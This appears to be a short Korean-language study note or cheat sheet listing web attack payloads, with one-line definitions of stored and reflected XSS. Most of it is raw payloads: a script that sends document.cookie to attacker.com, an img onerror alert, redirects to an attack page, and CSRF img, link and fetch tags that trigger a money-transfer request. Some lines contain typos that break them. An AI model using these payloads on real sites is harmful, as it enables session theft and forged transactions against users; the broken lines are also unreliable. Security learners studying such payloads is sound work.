H232C 2020. 1. 13. 19:28

 

1. XSS

<script>

alert("test"); document.cookie; alert(document.cooki);

new Image().src = "https://attacker.com/?savecookie="+document.cookie;

</script>

 

<img src="@" onerror="alert('xss');">

 

<script>

location.href="https://attaker.com/attack.jsp"; window.open("http://attacker.com/attack.jsp");

</script>

- Stored XSS : DB등에 악성 스크립트를 저장시켜 호출 시 동작하게 함

- Reflected XSS : 팔라미터입력값에 악성 스크립트를 삽입하여 출력 시 동작하게 함 (주로 검색, 오류 페이지 등 사용)

 

2. CSRF

<img src="/money?to=test&money=1000">

<img src=1 onerror="fetch('/money?to=test&money=1000');>"

<link rel="stylesheet" href="/money?to=test&money=1000">